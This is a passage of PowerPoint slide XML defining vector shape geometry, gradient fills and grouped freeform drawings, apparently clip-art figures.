                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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606" name="Freeform 1702"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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607" name="Freeform 1703"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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608" name="Freeform 1704"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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609" name="Freeform 1705"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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596" name="Group 1787"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2339975" y="3392488"/>
                <a:ext cx="246063" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="597" name="Freeform 1788"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2474" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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598" name="Freeform 1789"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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599" name="Freeform 1790"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBez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600" name="Freeform 1791"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2440" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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601" name="Oval 1792"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
